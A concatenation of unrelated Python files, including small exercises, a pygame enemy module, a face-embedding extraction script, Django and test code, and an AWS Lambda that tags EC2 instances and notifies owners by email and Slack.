add_reloc(reloc)
def initialize_spim_context():
for rom_address, reloc in all_relocs.items():
reloc_type = spimdisasm.common.RelocType.fromStr(reloc.reloc_type)
if reloc_type is None:
log.error(
f"Reloc type '{reloc.reloc_type}' is not valid. Rom address: 0x{rom_address:X}"
)
symbols.spim_context.addGlobalReloc(
rom_address, reloc_type, reloc.symbol_name, addend=reloc.addend
)
|
987,152 | a3d0d6d3c2a5dbcea1ea61a641309af3c2db2502 | import matplotlib.pyplot as plt
import numpy as np
import random as ran
from math import pi
num=100000
rmin=0.0
rmax=10.0
a=0.0
b=0.5 #max value of P
nbin=50
ranr=[]
r=[]
mybin=[]
for i in range(0,num):
temp=0.5*np.log(1/(2*ran.uniform(a,b))) #P=2*exp(-2r)
ranr.append(temp)
step=(rmax-rmin)/nbin
for i in range(0,nbin+1):
mybin.append(i*step)
P,edges=np.histogram(ranr,bins=mybin)
#P=P/(float(np.sum(P))*(edges[1]-edges[0])) #normalize P to add to 1
#for i in range(0,len(edges)-1):
# r.append(0.5*(edges[i+1]+edges[i]))
P=P/(float(np.sum(P))*(mybin[1]-mybin[0])) #normalize P to add to 1
for i in range(0,len(mybin)-1):
r.append(0.5*(mybin[i+1]+mybin[i]))
plt.plot(r,P,linewidth=3)
print r
r=np.arange(rmin,rmax,0.05)
plt.plot(r,2.0*np.exp(-2*r),'r',linewidth=2)
#plt.xlim(rmin,rmax)
plt.show()
|
987,153 | 265dc2e7ded69e2b0c6357f0bd1bf7bc51d78e6f | import pygame
import time
import random
from .. import res, constants, tools
from . import tile
import json
from .. import core
def setup_res():
global enemy_dict, gravity
enemy_dict = {}
sc = constants.IMAGE_SCALE
# 资源
with open(constants.enemy_info_path) as f:
info = json.loads(f.read())
image_name = info['image_name']
interval = info['interval']
sheet = res.images[image_name]
enemyinfo = info['enemy']
sub_d_names = info['sub_d_names']
#colorkey = (255, 255, 255)
for name in enemyinfo.keys():
rlist = []
info2 = enemyinfo[name]
(x, y, w, h) = tuple(info2['first'])
size = info2['size']
if name in sub_d_names:
sub_d = 1
else:
sub_d = 0
for i in range(size[1]):
rlist.append(_trim_image_row_(sheet, x, y, w, h, interval[0], size[0], sc,\
sub_d=sub_d))
y += interval[1]
enemy_dict[name] = rlist
for shell_d_row in enemy_dict['shell_d']:
s = shell_d_row[0]
r = s.get_rect()
s2 = pygame.transform.scale(s, (int(r.width * shell_wag_w_scale), r.height))
shell_d_row.append(s2)
spd = enemy_dict['speed'] = info['speed']
gravity = spd['gravity']
Goomba.speed_x_vel = spd['goomba']['x_vel']
Koopa.speed_x_vel = spd['koopa']['x_vel']
Koopa.shell_speed_x_vel = spd['shell']['x_vel']
PipeFlower.speed_y_vel = spd['pipeflower']['y_val']
def _trim_image_row_(sheet,
x,
y,
width,
height,
interval,
count,
scale=1,
colorkey=(0, 0, 0), sub_d = 0):
imgs = []
for i in range(count):
y2 = y
if i % 2 == 1:
y2 -= sub_d
img = res.trim_image(sheet, x, y2, width, height, scale, colorkey)
imgs.append(img)
x += interval
return imgs
cfg_enemy_height = 24
def create_enemy(data):
global cfg_enemy_height
#print(data)
typ = data['type']
x, y, d, color = data['x'], data['y'] - cfg_enemy_height, data['direction'], data['color']
if 'num' in data:
num = data['num']
else:
num = 1
enemys = core.LinkList()
for i in range(num):
if typ == 0:
enemy = Goomba(x, y, d, color)
elif typ == 1:
enemy = Koopa(x, y, d, color)
else:
enemy = Goomba(x, y, d, color) # !!!
x += enemy.rect.width + 10
enemys.push(enemy)
return enemys
class Enemy(core.Sprite):
def __init__(self, direction):
super().__init__()
self.face_right = False if direction == 0 else True
self.frame = 0
self.y_acc = self.y_vel = 0
self.dead = False
self.collide = True
def fall(self):
self.y_acc = gravity
def touch_ground(self, item):
self.y_acc = self.y_vel = 0
if isinstance(item, tile.Tile) and item.is_jack_up:
self.go_die()
SubYGoomba = 46
SubYKoopa = 64
goomba_die_timeout = 2
goomba_wag_epoch = 0.500
koopa_wag_epoch = 0.500
shell_wag_epoch = 0.150
jump_y_vel = 800
class Goomba(Enemy):
def __init__(self, x, y, direction, color):
super().__init__(direction)
global enemy_dict
self.stand_frames = enemy_dict['goomba'][color]
self.stamped_frame = enemy_dict['goomba_die'][color][0]
self.image = self.stand_frames[0]
super().__init_rect__(x, y)
if self.face_right:
self.x_vel = Goomba.speed_x_vel
else:
self.x_vel = - Goomba.speed_x_vel
self.killmark = 100
wag_timer = 0
def update(self, d_sec):
self.y_vel += self.y_acc * d_sec
if self.dead:
if time.time() - self.die_time > goomba_die_timeout:
self.killed = True
else:
self.wag_timer += d_sec
if self.wag_timer > goomba_wag_epoch:
self.wag_timer = 0
self.frame = (self.frame + 1) % 2
self.set_image(self.stand_frames[self.frame])
r = self.image.get_rect()
self.rect.width = r.width
self.rect.height = r.height
def touch_x(self, item, is_right):
self.x_vel = - self.x_vel
self.frame = (self.frame + 1) % 2
def stamp(self, is_right):
self.die_time = time.time()
self.dead = True
self.x_vel = 0
self.set_image(self.stamped_frame)
self.fall()
def go_die(self):
self.die_time = time.time()
self.dead = True
self.x_vel = 0
self.y_vel = - jump_y_vel
self.y_acc = gravity
self.set_image(pygame.transform.flip(self.stand_frames[0], False, True))
self.collide = False
shell_wag_w_scale = 0.8
st_koopa_turtle = 0
st_koopa_shell_static = 1
st_koopa_shell_run = 2
class Koopa(Enemy):
def __init__(self, x, y, direction, color):
super().__init__(direction)
global enemy_dict
self.left_frames = enemy_dict['koopa'][color][2:]
self.right_frames = []
for im in self.left_frames:
self.right_frames.append(pygame.transform.flip(im, True, False))
self.shell_d_frames = enemy_dict['shell_d'][color]
self.shell_frame = enemy_dict['shell'][color][0]
if self.face_right:
self.image = self.right_frames[0]
else:
self.image = self.left_frames[0]
super().__init_rect__(x, y)
if self.face_right:
self.x_vel = Koopa.speed_x_vel
else:
self.x_vel = - Koopa.speed_x_vel
self.state = st_koopa_turtle
self.killmark = 200
wag_timer = 0
def update(self, d_sec):
self.y_vel += self.y_acc * d_sec
self.wag_timer += d_sec
if self.state == st_koopa_turtle:
if self.wag_timer > koopa_wag_epoch:
self.wag_timer = 0
self.frame = (self.frame + 1) % 2
if self.face_right:
self.set_image(self.right_frames[self.frame])
else:
self.set_image(self.left_frames[self.frame])
elif self.state == st_koopa_shell_static:
self.set_image(self.shell_frame)
elif self.state == st_koopa_shell_run:
if self.wag_timer > shell_wag_epoch:
wag_timer = 0
self.frame = (self.frame + 1) % 2
self.set_image(self.shell_d_frames[self.frame])
r = self.image.get_rect()
self.rect.width = r.width
self.rect.height = r.height
if self.dead:
if time.time() - self.die_time > goomba_die_timeout:
self.killed = True
def touch_x(self, item, is_right):
self.x_vel = - self.x_vel
self.face_right = not self.face_right
self.frame = (self.frame + 1) % 2
def stamp(self, is_right):
if self.state == st_koopa_shell_static:
self.state = st_koopa_shell_run
if is_right:
self.x_vel = Koopa.shell_speed_x_vel
else:
self.x_vel = - Koopa.shell_speed_x_vel
else:
self.state = st_koopa_shell_static
self.x_vel = 0
self.fall()
def go_die(self):
self.die_time = time.time()
self.dead = True
self.x_vel = 0
self.y_vel = - jump_y_vel
self.y_acc = gravity
self.state = st_koopa_shell_static
self.collide = False
class FlyKoopa(Koopa):
def __init__(self, x, y, direction, color):
super().__init__(x, y, direction, color)
global enemy_dict
pass
class PipeFlower(Enemy):
def __init__(self, pipe, color=0, eat_frec_sec=0.34, stay_sec=2):
super().__init__(0)
self.frames = enemy_dict['pipeflower'][color]
self.eat_frec_sec = eat_frec_sec
self.stay_sec = stay_sec
self.full_image = self.image = im = self.frames[0]
x, y = tools.center_top_pos(pipe.rect, (im.get_width(), im.get_height()))
y = pipe.rect.y
self.pipe = pipe
super().__init_rect__(x, y)
self.collide = False
self.speed_y_vel = - PipeFlower.speed_y_vel
self.y_vel = self.speed_y_vel
self.x_vel = 0
self.eat_timer = 0
self.stay_timer = 0
self.at_end = False
self.killmark = 200
def update(self, d_sec):
self.eat_timer += d_sec
if self.eat_timer > self.eat_frec_sec:
self.eat_timer = 0
self.frame = (self.frame+1) % 2
self.full_image = self.frames[self.frame]
if not self.at_end and (self.rect.bottom <= self.pipe.rect.y + 1 or self.rect.y >= self.pipe.rect.y + 1):
self.y_vel = 0
self.stay_timer = 0
self.speed_y_vel = -self.speed_y_vel
self.at_end = True
if self.at_end:
self.stay_timer += d_sec
if self.stay_timer > self.stay_sec:
self.at_end = False
self.stay_timer = 0
self.y_vel = self.speed_y_vel
r1 = self.rect.to_int_rect()
r2 = self.full_image.get_rect()
r2.height -= max(0, r1.bottom - self.pipe.rect.y)
r2.height = max(0, r2.height)
self.set_image(self.full_image.subsurface(r2))
def go_die(self):
self.killed = True
|
987,154 | e19e6b4ccde6f388c8c7a5288125e7360c62ee3f |
import tensorflow as tf
ts = tf.InteractiveSession()
d = [1, 2, 8, -1, 0, 5.5, 6, 13]
spikes = tf.Variable([False] * len(d), name='spikes')
spikes.initializer.run()
saver = tf.train.Saver()
#
#
#
for i in range(1, len(d)):
if d[i] - d[i-1] > 5:
spikes_val = spikes.eval()
spikes_val[i] = True
updater = tf.assign(spikes, spikes_val)
updater.eval()
save_path = saver.save(ts, "/home/fyliu/spikes.ckpt")
print("spikes data saved in file: %s" % save_path)
ts.close()
|
987,155 | 6278204e3cceb48983437c5ecc8a9cac6654e003 | class Monkey:
__no_of_bananas=40
def eat_banana(self):
print("eating banana")
Monkey.__no_of_bananas-=1
@staticmethod
def get_banana_count():
print("No. of bananas left: ",Monkey.__no_of_bananas)
gopher=Monkey()
doodoo=Monkey()
gopher.eat_banana()
doodoo.eat_banana()
Monkey.get_banana_count() |
987,156 | f94216dc4b7b2555e91a1f3d4ca81667d143b9e5 | # Given an array of intervals where intervals[i] = [starti, endi], merge all overlapping intervals, and return an array of the non-overlapping intervals that cover all the intervals in the input.
# Example 1:
# Input: intervals = [[1,3],[2,6],[8,10],[15,18]]
# Output: [[1,6],[8,10],[15,18]]
# Explanation: Since intervals [1,3] and [2,6] overlaps, merge them into [1,6].
# Example 2:
# Input: intervals = [[1,4],[4,5]]
# Output: [[1,5]]
# Explanation: Intervals [1,4] and [4,5] are considered overlapping.
# Constraints:
# 1 <= intervals.length <= 10**4
# intervals[i].length == 2
# 0 <= starti <= endi <= 10**4
from typing import List
class Solution:
def merge(self, intervals: List[List[int]]) -> List[List[int]]:
out = []
if len(intervals) <= 1 :
return [] if len(intervals) == 0 else intervals
intervals.sort(key=lambda x: x[0])
# [[0,2],[1,4],[3,5]]
prev_l, prev_r = intervals[0][0], intervals[0][1]
out.append(intervals[0])
for i in range(1, len(intervals)):
l, r = intervals[i][0], intervals[i][1]
if out[-1] == intervals[i]:
continue
if l <= prev_r:
out.pop()
# print(prev_l,prev_r, l, r)
out.append([min(l, prev_l), max(r, prev_r)])
# overlap
else:
out.append(intervals[i])
prev_l, prev_r = out[-1][0], out[-1][1]
return out
intervals = [[1,3],[2,6],[8,10],[15,18]]
exp = [[1, 6], [8, 10], [15, 18]]
# print(Solution().merge(intervals))
assert Solution().merge(intervals) == exp
intervals = [[1,4],[5,6]]
exp = [[1, 4], [5, 6]]
print(Solution().merge(intervals))
assert Solution().merge(intervals) == exp
intervals = [[1,3]]
exp= [[1, 3]]
print(Solution().merge(intervals))
assert Solution().merge(intervals) == exp
intervals = [[1,4],[0,0]]
exp = [[0,0],[1,4]]
print(Solution().merge(intervals))
assert Solution().merge(intervals) == exp
intervals = [[1,4],[0,2],[3,5]]
exp = [[0,5]]
print(Solution().merge(intervals))
assert Solution().merge(intervals) == exp
intervals = [[0,0],[1,2],[5,5],[2,4],[3,3],[5,6],[5,6],[4,6],[0,0],[1,2],[0,2],[4,5]]
exp = [[0,6]]
print(Solution().merge(intervals))
assert Solution().merge(intervals) == exp
|
987,157 | 4b8e230a6a1284c2925ed5f25337bbb1d52f19cb | A, B, C = input().split()
A = float(A)
B = float(B)
C = float(C)
if A >= B + C or B >= C + A or C >= A + B or A <= abs(B - C) or B <= abs(A - C) or C <= abs(A - B):
area = (A + B)*C/2
print("Area = %.1f" % area)
else:
perimetro = A + B + C
print("Perimetro = %.1f" % perimetro)
|
987,158 | a87fb0174a71d3aa1d5146add65cdc9509d3b6e8 | from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import lz
from lz import *
import os
from datetime import datetime
import os.path
from easydict import EasyDict as edict
import time
import json
import sys
import numpy as np
import importlib
import itertools
import argparse
import struct
import cv2
import sklearn
from sklearn.preprocessing import normalize
import mxnet as mx
from mxnet import ndarray as nd
import lmdb, six
from PIL import Image
lz.init_dev((0, 1, 2, 3))
image_shape = (3, 112, 112)
net = None
data_size = 1862120
emb_size = 0
use_flip = True
use_mxnet = False
env = None
glargs = None
xrange = range
def do_flip(data):
for idx in xrange(data.shape[0]):
data[idx, :, :] = np.fliplr(data[idx, :, :])
def get_feature(buffer):
global emb_size
if use_flip:
input_blob = np.zeros((len(buffer) * 2, 3, image_shape[1], image_shape[2]))
else:
input_blob = np.zeros((len(buffer), 3, image_shape[1], image_shape[2]))
idx = 0
for item in buffer:
if env is None:
img = cv2.imread(item)[:, :, ::-1] # to rgb
else:
item = item.replace(glargs.input, '')
with env.begin(write=False) as txn:
imgbuf = txn.get(str(item).encode())
buf = six.BytesIO()
buf.write(imgbuf)
buf.seek(0)
f = Image.open(buf)
img = f.convert('RGB')
img = np.asarray(img)
img = np.transpose(img, (2, 0, 1))
attempts = [0, 1] if use_flip else [0]
for flipid in attempts:
_img = np.copy(img)
if flipid == 1:
do_flip(_img)
input_blob[idx] = _img
idx += 1
input_blob = input_blob.astype('float32')
if use_mxnet:
data = mx.nd.array(input_blob)
db = mx.io.DataBatch(data=(data,))
net.model.forward(db, is_train=False)
_embedding = net.model.get_outputs()[0].asnumpy()
else:
data = input_blob - 127.5
data /= 127.5
data = to_torch(data)
with torch.no_grad():
_embedding = net.model(data).cpu().numpy()
if emb_size == 0:
emb_size = _embedding.shape[1]
print('set emb_size to ', emb_size)
if use_flip:
embedding1 = _embedding[0::2]
embedding2 = _embedding[1::2]
embedding = embedding1 + embedding2
embedding /= 2
else:
embedding = _embedding
embedding = sklearn.preprocessing.normalize(embedding) # todo
# print('norm ', np.linalg.norm(embedding, axis=1))
return embedding
def write_bin(path, m):
rows, cols = m.shape
with open(path, 'wb') as f:
f.write(struct.pack('4i', rows, cols, cols * 4, 5))
f.write(m.data)
def main(args):
global image_shape, net, env, glargs
print(args)
glargs = args
env = lmdb.open(args.input + '/imgs_lmdb', readonly=True,
# max_readers=1, lock=False,
# readahead=False, meminit=False
)
ctx = []
cvd = os.environ['CUDA_VISIBLE_DEVICES'].strip()
if len(cvd) > 0:
for i in xrange(len(cvd.split(','))):
ctx.append(mx.gpu(i))
if len(ctx) == 0:
ctx = [mx.cpu()]
print('use cpu')
else:
print('gpu num:', len(ctx))
image_shape = [int(x) for x in args.image_size.split(',')]
if use_mxnet:
net = edict()
vec = args.model.split(',')
assert len(vec) > 1
prefix = vec[0]
epoch = int(vec[1])
print('loading', prefix, epoch)
net.ctx = ctx
net.sym, net.arg_params, net.aux_params = mx.model.load_checkpoint(prefix, epoch)
# net.arg_params, net.aux_params = ch_dev(net.arg_params, net.aux_params, net.ctx)
all_layers = net.sym.get_internals()
net.sym = all_layers['fc1_output']
net.model = mx.mod.Module(symbol=net.sym, context=net.ctx, label_names=None)
net.model.bind(data_shapes=[('data', (args.batch_size, 3, image_shape[1], image_shape[2]))])
net.model.set_params(net.arg_params, net.aux_params)
else:
# sys.path.insert(0, lz.home_path + 'prj/InsightFace_Pytorch/')
from config import conf
from Learner import FaceInfer
conf.need_log = False
conf.batch_size = args.batch_size
conf.fp16 = True
conf.ipabn = False
conf.cvt_ipabn = False
conf.use_chkpnt = False
net = FaceInfer(conf, gpuid=range(conf.num_devs))
net.load_state(
resume_path=args.model,
latest=False,
)
net.model.eval()
features_all = None
i = 0
fstart = 0
buffer = []
for line in open(os.path.join(args.input, 'filelist.txt'), 'r'):
if i % 1000 == 0:
print("processing ", i, data_size, 1. * i / data_size)
i += 1
line = line.strip()
image_path = os.path.join(args.input, line)
buffer.append(image_path)
if len(buffer) == args.batch_size:
embedding = get_feature(buffer)
buffer = []
fend = fstart + embedding.shape[0]
if features_all is None:
features_all = np.zeros((data_size, emb_size), dtype=np.float32)
# print('writing', fstart, fend)
features_all[fstart:fend, :] = embedding
fstart = fend
if len(buffer) > 0:
embedding = get_feature(buffer)
fend = fstart + embedding.shape[0]
print('writing', fstart, fend)
features_all[fstart:fend, :] = embedding
write_bin(args.output, features_all)
# os.system("bypy upload %s"%args.output)
def parse_arguments(argv):
parser = argparse.ArgumentParser()
parser.add_argument('--batch_size', type=int, help='', default=160 * 4)
parser.add_argument('--image_size', type=str, help='', default='3,112,112')
parser.add_argument('--input', type=str, help='', default='')
parser.add_argument('--output', type=str, help='', default='')
parser.add_argument('--model', type=str, help='', default='')
parser.set_defaults(
input='/data/share/iccv19.lwface/iccv19-challenge-data/',
# output=lz.work_path + 'mbfc.retina.cl.arc.cotch.bin',
output=lz.work_path + 'mbfc.cotch.mual.1e-3.bin',
# model=lz.root_path + '../insightface/logs/r50-arcface-retina/model,16',
# model=lz.root_path + 'work_space/mbfc.retina.cl.arc.cotch.cont/models',
model=lz.root_path + 'work_space/mbfc.cotch.mual.1e-3.cont/models',
)
return parser.parse_args(argv)
if __name__ == '__main__':
main(parse_arguments(sys.argv[1:]))
|
987,159 | cd401f4697093b008fd5bc978b31f166a4024755 | # Generated by Django 2.1.4 on 2018-12-21 13:43
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('assets', '0006_auto_20181220_1657'),
]
operations = [
migrations.AlterModelOptions(
name='ip',
options={'ordering': ['-m_time'], 'verbose_name': 'IP表', 'verbose_name_plural': 'IP表'},
),
migrations.RemoveField(
model_name='ip',
name='c_time',
),
migrations.RemoveField(
model_name='ip',
name='tags',
),
]
|
987,160 | 33187f82d9aa156d6044c25416bca7bd90d2acc9 | from .serializer_manager import SerializerManager
__all__ = ('SerializerManager',)
|
987,161 | 557c8bec89dc33104fe24de213511ba92a62d14c | from rebase.common.utils import ids, RebaseResource
from rebase.tests.common.ticket import (
case_github_contractor,
case_github_mgr,
case_github_admin,
case_github_admin_collection,
case_github_anonymous,
case_github_anonymous_collection,
)
from . import PermissionTestCase
from .ticket import BaseTestTicketResource
class TestGithubTicket(PermissionTestCase):
model = 'GithubTicket'
def new(self, github_ticket):
return {
'project': ids(github_ticket.project),
'number': github_ticket.number+1
}
def update(_, ticket):
updated_ticket = ids(ticket)
updated_ticket.update(
title=ticket.title+' yo mama',
description=ticket.description+'yo mama'
)
return updated_ticket
def validate_view(self, github_ticket):
self.assertTrue(github_ticket)
self.assertIn('id', github_ticket)
self.assertIsInstance(github_ticket['id'], int)
self.assertIn('title', github_ticket)
self.assertIsInstance(github_ticket['title'], str)
self.assertIn('number', github_ticket)
self.assertIsInstance(github_ticket['number'], int)
self.assertIn('description', github_ticket)
self.assertIsInstance(github_ticket['description'], str)
def test_contractor_collection(self):
self.collection(case_github_contractor, 'contractor')
def test_contractor_view(self):
self.view(case_github_contractor, 'contractor', True)
def test_contractor_modify(self):
self.modify(case_github_contractor, 'contractor', False)
def test_contractor_delete(self):
self.delete(case_github_contractor, 'contractor', False)
def test_contractor_create(self):
self.create(case_github_contractor, 'contractor', False)
def test_mgr_collection(self):
self.collection(case_github_mgr, 'manager')
def test_mgr_view(self):
self.view(case_github_mgr, 'manager', True)
def test_mgr_modify(self):
self.modify(case_github_mgr, 'manager', True)
def test_mgr_delete(self):
self.delete(case_github_mgr, 'manager', True)
def test_mgr_create(self):
self.create(case_github_mgr, 'manager', True)
def test_admin_collection(self):
self.collection(case_github_admin_collection, 'manager')
def test_admin_view(self):
self.view(case_github_admin, 'manager', True)
def test_admin_modify(self):
self.modify(case_github_admin, 'manager', True)
def test_admin_delete(self):
self.delete(case_github_admin, 'manager', True)
def test_admin_create(self):
self.create(case_github_admin, 'manager', True)
def test_anonymous_collection(self):
self.collection(case_github_anonymous_collection, 'manager')
def test_anonymous_view(self):
self.view(case_github_anonymous, 'manager', False)
def test_anonymous_modify(self):
self.modify(case_github_anonymous, 'manager', False)
def test_anonymous_delete(self):
self.delete(case_github_anonymous, 'manager', False)
def test_anonymous_create(self):
self.create(case_github_anonymous, 'manager', False)
|
987,162 | 6bc85d00444e8465ba18dd45617ba15d243a25a5 | import json, boto3, datetime, os, base64, ast, sys
from botocore.exceptions import ClientError
# global variables used for email and slack
URL = os.environ.get("sqs_url")
SENDER_EMAIL = os.environ.get("sender_email")
APP_URL = os.environ.get("slack_application_url")
CHANNEL = os.environ.get("slack_channel")
CHANNEL_ID = os.environ.get("slack_channel_id")
MODE = ""
def lambda_handler(event, context):
"""
# Handler that triggers upon an event hooked up to Lambda
:param event: event data in the form of a dict
:param context: runtime information of type LambdaContext
:return: codes indicating success or failure
"""
MODE = os.environ.get('mode')
if not MODE:
MODE = 'audit'
print("Operating in " + MODE + " mode")
sqs_client = boto3.client('sqs')
# keep looping until no more messages
missingOwners = {}
missingPatches = {}
while True:
sqs_response = sqs_client.receive_message(
QueueUrl = URL,
AttributeNames=['ApproximateNumberOfMessages'],
MaxNumberOfMessages= 10,
MessageAttributeNames=['instance-launch-info']
)
if 'Messages' in sqs_response:
for message in sqs_response['Messages']:
canDelete = False
instance_detail = json.loads(message['Body'])['detail']
nt_id = instance_detail['userIdentity']['principalId'].split(':')[1]
if instance_detail['responseElements'] != None:
instances = instance_detail['responseElements']['instancesSet']['items']
for instance in instances:
instance_id = instance['instanceId']
ec2client = boto3.client("ec2")
response = ec2client.describe_instances(InstanceIds=[instance_id])
if response["Reservations"] and response["Reservations"][0]["Instances"]:
instValid, item1, item2 = checkTags(instance_id,
response["Reservations"][0]['Instances'][0]['Tags'], nt_id,)
if item1:
if nt_id in missingOwners:
missingOwners[nt_id].append(item1)
else:
missingOwners[nt_id] = [item1]
if item2:
if nt_id in missingPatches:
missingPatches[nt_id].append(item2)
else:
missingPatches[nt_id] = [item2]
canDelete = canDelete and instValid
else:
canDelete = True
if canDelete:
sqs_client.delete_message(
QueueUrl= URL,
ReceiptHandle= message['ReceiptHandle']
)
print("Deleted queue message")
else:
print("No more messages found in the queue")
break
for user in missingOwners:
notify(user, str(missingOwners[user]), "is missing Owning_Mail or Owning_Team tags",
"Please add these tags to your resources.", "Missing Owner Tags", "Alert: Missing Owner tags!")
for user in missingPatches:
notify(user, str(missingPatches[user]), "has an invalid Patch Group tag. These resources will receive the latest patches",
"If you do not need the latest patches, please fix these tags", "Invalid Patch Tags", "Error: Invalid patch tags!")
return {
"statusCode": 200,
"body": json.dumps('Tagged resources')
}
def checkTags(instance_id, tagSet, nt_id):
"""
# Checks for tags and adds them if they are not present
"""
tags = []
missingOwnersItem = ""
missingPatchesItem = ""
patch_name = ""
isPatchTag = False
isExpiration = False
isCreatorID = False
isOwnerMailTag = False
isOwnerTeamTag = False
for tag in tagSet:
if tag['Key'] == 'Expiration':
isExpiration = True
if tag['Key'] == 'Creator ID':
isCreatorID = True
if tag['Key'] == 'Patch Group':
isPatchTag = checkPatchValidity(tag['Value'])
if tag['Key'] == 'Owning_Mail':
isOwnerMailTag = True
if tag['Key'] == 'Owning_Team':
isOwnerTeamTag = True
if not isExpiration:
tags.append(
{
'Key': 'Expiration',
'Value': (datetime.date.today() + datetime.timedelta(days = 30)).strftime('%Y-%m-%d')
})
if not isCreatorID:
tags.append(
{
'Key': 'Creator ID',
'Value': nt_id
})
if not isOwnerTeamTag or not isOwnerMailTag:
missingOwnersItem = instance_id
if not isPatchTag:
print("invalid patch tags!")
missingPatchesItem = instance_id
patch_name = createPatchTag(tags, instance_id, nt_id)
tags.append({ 'Patch Group' : patch_name })
print("Attaching tags: " + str(tags) + " to instance " + instance_id)
if MODE == 'enforce':
attachInstanceTags(instance_id, tags)
if MODE == "enforce" and patch_name != "Not yet populated" and isOwnerMailTag and isOwnerTeamTag:
return True
return False, missingOwnersItem, missingPatchesItem
def checkPatchValidity(val):
"""
# checks if the PatchGroup tag is valid
:param val: the tag to evaluate
:return: boolean if valid or not
"""
tag_list = val.split('-')
if len(tag_list) < 5:
return False
if tag_list[0] not in os.environ.get('environment'):
return False
if tag_list[1] not in os.environ.get('platform'):
return False
if tag_list[2] not in os.environ.get('role'):
return False
if tag_list[3] not in os.environ.get('urgency'):
return False
if tag_list[4] not in os.environ.get('order'):
return False
return True
def createPatchTag(tags, instance_id, nt_id):
"""
# creates a patch tag based on platform, filler if platform not found
:param tags: the list of tags to add to a resource
:param instance_id: the id of the resource
:param nt_id: the nt_id owner of a resource
:return: The tag value
"""
client = boto3.client('ssm')
response = client.describe_instance_information(
InstanceInformationFilterList=[
{
'key': 'InstanceIds',
'valueSet': [instance_id]
}
]
)
patch_tag_value = ''
platform_name = ''
if (response['InstanceInformationList']):
platform_name = response['InstanceInformationList'][0]['PlatformName']
if 'Red Hat Enterprise Linux' in platform_name:
patch_tag_value = 'default-rhel'
elif 'Windows' in platform_name:
patch_tag_value = 'default-windows'
elif 'Ubuntu' in platform_name:
patch_tag_value = 'default-ubuntu'
elif 'Centos' in platform_name:
patch_tag_value = 'default-centos'
elif 'Amazon Linux 2' in platform_name:
patch_tag_value = 'default-amazon2'
elif 'Amazon Linux' in platform_name:
patch_tag_value = 'default-amazon'
else:
print("No patch group found for platform")
patch_tag_value = 'Not yet populated'
return patch_tag_value
def attachInstanceTags(instance_id, tags):
"""
# attaches a list of tags to a resource
:param instance_id: the id of the resource
:param tags: list of tags to add
:return: boolean value to indicate if the instance exists or not, true if not found!
"""
empty = False
lambda_client = boto3.client('lambda')
data = {
'comp_name': "attachInstanceTags",
'action': "attach tags",
'level': "info",
'msg': "attached " + str(tags) + " to instance " + instance_id
}
try:
client = boto3.client('ec2')
response = client.create_tags(
Resources=[instance_id],
Tags= tags
)
print("Attached tags to instance")
except ClientError as e:
if e.response['Error']['Code'] == 'InvalidInstanceID.NotFound':
print("No such instance exists")
empty = True
else:
print("Error attaching tags to instance: " + str(e))
if (not empty):
invoke_response = lambda_client.invoke(
FunctionName= os.environ.get("notify_snitch"),
InvocationType= "RequestResponse",
Payload= json.dumps(data)
)
def create_messages(application, action, remedy):
"""
# Creates a preformatted message depending on expiration
:param application: name of the application
:param action: What is being done to the application
:param remedy: steps to take
:return: String containing the message
"""
messages = []
messages.append("""Your Resources: </br><pre style="margin-left: 40px">""" + application + "</br></pre>" + action + """ in AWS. <strong style="font-family: 'Helvetica Neue',Helvetica,Arial,sans-serif; box-sizing: border-box; font-size: 14px; margin: 0;">""" + remedy +"""</strong>
</td>
</tr><tr style="font-family: 'Helvetica Neue',Helvetica,Arial,sans-serif; box-sizing: border-box; font-size: 14px; margin: 0;"><td class="content-block" style="font-family: 'Helvetica Neue',Helvetica,Arial,sans-serif; box-sizing: border-box; font-size: 14px; vertical-align: top; margin: 0; padding: 0 0 20px;" valign="top">
This message was sent to inform you of changes happening to your resources.
<ul>
<li>New instances are auto-tagged with an expiration date, an NT ID, and a patch group if invalid.</li>
<li>Instances without the necessary tags are notified through email and Slack.</li>
</ul>
If you have any further questions, please reply to this email.""")
messages.append("Your Resources:\n\n" + application + "\n\n" + action + " in AWS. " + remedy + "\n" +
("\nThis message was sent to inform you of changes happening to your resources.\n"
"\nNew instances are auto-tagged with an expiration date, an NT ID, and a patch group if invalid."
"Instances without Owner Mail and Owner Team tags are notified through email and slack.\n"
"\nIf you have any further questions, please reply to this email."))
return messages
def get_email(nt_id):
"""
# Retrieves the email from an nt_id
:param nt_id: the id to search through
:return: email address or None if not found
"""
secret = json.loads(get_secret())
username = secret['account_name']
pw = secret['password']
data = {
"domain": "corporate.t-mobile.com",
"base_dname": "OU=Production,OU=Users,OU=Accounts,DC=Corporate,DC=T-Mobile,DC=com",
"bind_dname": "CN=%s,OU=LDAPS,OU=Non-production,OU=Services,OU=Accounts,DC=corporate,DC=t-mobile,DC=com" % username,
"password": pw,
"obj_name": nt_id,
"obj_class": "user",
"attributes": ["mail"],
}
lambda_client = boto3.client('lambda')
invoke_response = lambda_client.invoke(
FunctionName= os.environ.get("query_ldap"),
InvocationType= "RequestResponse",
Payload= json.dumps(data)
)
if ("FunctionError" not in invoke_response):
data = ast.literal_eval(json.load(invoke_response['Payload'])['body'])
print(data)
return data[0][0][1]['mail'][0]
return None
def notify(nt_id, application, action, remedy, subj, heading):
"""
# notifies an owner through email and slack
:param nt_id: owner id to send to
:param application: the resource affected
:param action: the thing happening to the resource
:param remedy: steps taken to remedy
:param subj: subject line of the email
:param heading: heading line of the email
:return: N/A
"""
email = get_email(nt_id)
lambda_client = boto3.client('lambda')
messages = create_messages(application, action, remedy)
print(email)
email_data = {
'sender_mail': SENDER_EMAIL,
'email': email,
'subj': subj,
'heading': heading,
'messages': messages,
'region': os.environ.get("AWS_DEFAULT_REGION")
}
invoke_email_response = lambda_client.invoke(
FunctionName= os.environ.get("formatted_email"),
InvocationType= "RequestResponse",
Payload= json.dumps(email_data)
)
err = checkError(invoke_email_response, "Error sending email!")
if err:
print(str(err))
slack_data = {
'application_url': APP_URL,
'channel': CHANNEL,
'message': messages[1].rsplit("\n",5)[0],
'channel_id': CHANNEL_ID,
'nt_ids': [nt_id]
}
invoke_slack_response = lambda_client.invoke(
FunctionName= os.environ.get("slack_message"),
InvocationType= "RequestResponse",
Payload= json.dumps(slack_data)
)
err = checkError(invoke_slack_response, "Error sending slack message!")
if err:
print(str(err))
def get_secret():
"""
# gets the secret from AWS secrets manager
:param N/A:
:return: the secrets value or None if not found
"""
secret_name = "Jido-Active-Directory-Service-Account"
# Create a Secrets Manager client
session = boto3.session.Session()
client = session.client(
service_name='secretsmanager',
region_name= os.environ.get("AWS_DEFAULT_REGION")
)
